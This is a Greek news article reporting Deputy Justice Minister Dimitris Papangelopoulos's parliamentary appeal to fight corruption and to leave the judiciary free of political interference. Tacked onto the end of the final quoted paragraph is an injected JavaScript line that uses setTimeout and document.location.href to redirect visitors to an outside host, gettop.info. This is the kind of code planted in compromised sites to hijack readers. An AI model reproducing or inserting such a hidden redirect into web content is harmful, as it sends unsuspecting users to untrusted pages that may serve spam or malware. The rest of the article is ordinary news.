Παπαγγελόπουλος: Αφήστε τη Δικαιοσύνη ήρεμη- Δεν χρειάζονται επεμβάσεις

0
5

 

Έκκληση προς όλες τις πολιτικές δυνάμεις για ολοκληρωτικό πόλεμο και επιστράτευση κατά της διαπλοκής και διαφθοράς, απηύθυνε ο αναπληρωτής υπουργός Δικαιοσύνης Δημήτρης Παπαγγελόπουλος λίγο πριν κλείσει η συζήτηση των αρχηγών στη Βουλή.

Ο Δημήτρης Παπαγγελόπουλος, απηύθυνε επίσης έκκληση σε όλες τις πολιτικές δυνάμεις να αφήσουν τη Δικαιοσύνη ήρεμη και απερίσπαστη στο έργο της.

«Δεν χρειάζονται επεμβάσεις. Οι δικαστικοί και εισαγγελικοί λειτουργοί στη συντριπτική πλειονότητά τους είναι έντιμοι, ικανοί, εργατικοί και πιστοί στο καθήκον τους. Ελάχιστα ζιζάνια δεν χρειάζεται καν να τα ξεριζώσουμε θα μαραθούν μόνα τους», είπε ο αναπληρωτής υπουργός Δικαιοσύνης.

«Δεν διευκολύνουν την ανεξαρτησία της δικαιοσύνης φράσεις στελεχών των πολιτικών κομμάτων όταν λένε ‘θα παρακολουθούμε τις μηνύσεις’. Αυτό δεν είναι επιχείρηση εκφοβισμού, και χειραγώγησης της Δικαιοσύνης; Δεν είναι επέμβαση στην ανεξαρτησία της;», είπε ο Δημήτρης Παπαγγελόπουλος και χαρακτήρισε επίσης «έωλο επιχείρημα που έχει διατυπωθεί από διάφορα κανάλια», εκείνο που θέλει την κυβέρνηση να μην έχει πληρώσει τις θέσεις των αντιπροέδρων στην προσπάθεια της να χειραγωγήσει τη Δικαιοσύνη.

«Οι θέσεις δεν αφορούν το ΣτΕ, είναι στον ‘Αρειο Πάγο και το Ελεγκτικό Συνέδριο», επισήμανε χαρακτηριστικά ο αναπληρωτής υπουργός Δικαιοσύνης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here